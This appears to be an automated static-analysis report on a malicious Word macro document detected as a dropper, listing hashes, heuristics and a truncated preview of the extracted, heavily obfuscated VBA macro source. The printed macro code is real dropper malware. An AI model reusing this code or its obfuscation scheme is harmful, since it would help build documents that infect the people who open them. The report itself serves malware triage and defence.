Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 29d15dba3e945be3…

MALICIOUS

Office (OLE)

273.5 KB Created: 2018-02-28 11:26:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 29f5d8c30332fd752e496ab6b3de1526 SHA-1: 7d2b023984db6bb36974d4c71188c1b0fcf1a8c2 SHA-256: 29d15dba3e945be34c6e8226c983dcb3336299bc6958e4e34faf8e04cb8b5dfd
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, a critical heuristic firing, indicating an attempt to execute external code. The presence of a legacy WordBasic AutoOpen marker and the ClamAV detection further confirm its malicious nature. The VBA code is heavily obfuscated, but the Shell() call strongly suggests it's designed to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6464531-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6464531-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 86648 bytes
SHA-256: f8a6c4a410012873f16038441ea833e2512740c058314d39d66d41dfcec03b24
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "izSlTImrYi"
Sub FpDUOuOFbMf()
   On Error Resume Next
   While tmXvLfVTSi < DqLMQE
      Set GfzAAqh = AiTuHMDUYwv
      aLDOOaj = 9941430 + Round(CiwAOFzjtm) - 6337029 * Cos(2718780) / fmAYXzAWmN + Chr(rmucimZK)
      DzAVttGDofL = wvjQOpD / zGQUiIcLXzH
   Wend
   Select Case Wjbimii
      Case 5743566
         zhHCFtrNLUwWb = whfqlRufqXw
         STwijLZrBZJSY = 2972342
      Case 7111496
         LcLquzfBGosMwR = jDNaXPhlkwkhX
         NSVjzTOMI = Rnd(9565036)
      Case 4167263
         zXvSMvjiaOLp = Atn(2616202)
         iratKPIdtVX = Fix(6233450 + 9737911 * 9666424 * WvPEjSKpSj)
   End Select
   For zpzzHjSPpWmO = 7518782 To jTiZvj
      lFDTvkiPUBHJVR = 3628325 - uOqNiIGjjcw
      Select Case wfPXD
         Case 8440232
            jtfLwoA = ChrW(UiERoNnkL - CSng(SNcwT))
            TmbRomkGiFjm = CuZinlF
         Case 5407405
            KpKvESk = ChrB(kkZssJMiji)
            wniiBVJKtfoNO = 2059000
      End Select
      bmHshS = Sitn - 4186572
      For VwNVK = NzGDLiYbLJZ To 9020099
         rwvXKh = (7002505 * 6597705 + boAbcmNjo * Sin(zaffiJDjjAbzTn - CDbl(iBZaCnZ) * 388622 * XSDjBlNiVZvh) / 2323754 * CLng(3582526 - CDate(OHBAiwd)) / NQwlnFlMZ + 4687923 / (IPGTfwmwctrdR / MLumYTotzpS - AZYjN / Int(4265955 - Round(TKzIoW) + 459493 / 9211628)))
      Next
   Next
End Sub
Function wPYaHFLfWdUmB()
On Error Resume Next
inMqjJ = "GzPDVcStITqXNwPlnEzNBrrPSwlRqF"
GLSvnjvUik = GBbCtb = (7309551 * 7503123 + GclaCKLjaRS * Sin(OKIntrriK - CDbl(aDfNP) * 4883469 * OZYFMCjZoFzspX) / 6011767 * CLng(2186954 - CDate(srTPAjuEXDBi)) / oumiMstQBHbNF + 7317127 / (pVivrrUYFiOpd / pzfrt - CGGLmRXr / Int(6913244 - Round(BuzAPBYFqDUWj) + 77828 / 9680498)))
UwbKDr = PQMHw = (4317887 * 2244676 + riOTIaTdo * Sin(jTrdkna - CDbl(AqwjaGNjB) * 1396768 * cvfjcIhmEw) / 3187836 * CLng(6806437 - CDate(hTTfLljZjWWVY)) / IIGYYMw + 2367580 / (BkOVDAWc / HFzHmiXQbFv - JNDwYiwXs / Int(4403596 - Round(VBRuwQcYKumOT) + 2200204 / 243532)))
HVQTNwTjVbP = iuivbdfghnkjgyugjn(inMqjJ, 19, 7)
vkOtkYaVb = "ilTjQmViMqJOOXPtmq&wo=%2rav% tGnlARb"
jPJCDvpbkb = aBDtMiwHqHhoqn = (9395284 * 5867776 + SLYLG * Sin(UJBPiNjhVIfR - CDbl(tMKGHj) * 8258327 * rFJHizGqZH) / 7830914 * CLng(3771434 - CDate(jjKORtJ)) / MjLWqkpIER + 5997371 / (LdDrHvOa / vAqzsKczrpmhC - YwlrPQiUqJ / Int(762695 - Round(GjSHV) + 6057564 / 6781102)))
FBQIfSNd = QfUYwaNINbs = (6620753 * 1839674 + ftWEwJIbKhtqEw * Sin(kTGzTOsdMto - CDbl(ZHOQV) * 8550830 * AZlRjZ) / 5051601 * CLng(7917766 - CDate(nfHWRccIl)) / qjmPJKKGjTvQ + 4637797 / (wvGzBaYsZXqhmS / wfGflBYOKbHW - qWZXHJaV / Int(4166928 - Round(GLLzJOYcXr) + 3893110 / 7493393)))
AcwtjiTPI = iuivbdfghnkjgyugjn(vkOtkYaVb, 7, 12)
lrQNwnAUM = "Dqo%4rav%!!%3rav%!nzZYJbSbqFWMnokOzknoAZJp"
bZTdUnIQW = AtvSoQk = (6201411 * 3582872 + ZfGBIUR * Sin(JsQKnvJhFhk - CDbl(pMlMvmPJVWRY) * 5538549 * ZTYZNbtZO) / 4977991 * CLng(9204470 - CDate(GzJGLDviWMtuG)) / FHMmashQW + 8121078 / (fUJuQz / QFjQAOL - cwAMZiS / Int(8319509 - Round(mMczDHqcT) + 9585853 / 6111330)))
oDijGw = lkFPiiAppHz = (5240563 * 2308334 + jPJQiMcn * Sin(DVMMzq - CDbl(hRffrNvzqzSB) * 6398508 * PBnnYaSCTS) / 1216137 * CLng(9726347 - CDate(BuWRCzBZjv)) / YVUMZiuaFdo + 3830213 / (ZZQUfzMZs / uCUiPCfFjFGO - GGcoY / Int(6024623 - Round(zNazscjjuijHj) + 6993820 / 5028169)))
ZrosSih = iuivbdfghnkjgyugjn(lrQNwnAUM, 25, 15)
upFTJhwLPn = "AIGKzlcfHsBhRONhUUOdIes&&p=%1rav%r"
NXUZPzr = dtkpvSzdCjzjI = (3691461 * 5254761 + DjRzupq * Sin(zVfBjhOEwSfFq - CDbl(rCSPvd) * 2041694 * kHqVWFZ) / 465805 * CLng(9707918 - CDate(DrsanvwUSvip)) / VUtoOjiuMijk + 4545801 / (LKJivTs / wQRPW - aLPfuUUA / Int(5494929 - Round(LVTtrJJp) + 2963396 / 6903001)))
fSNlYo = KIQmVvTWcXwJ = (2383205 * 3904702 + SDqDr * Sin(itTaAzK - CDbl(HbAnjQDwtYYB) * 5803441 * sMLHYrqFzLsabO) / 9539
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.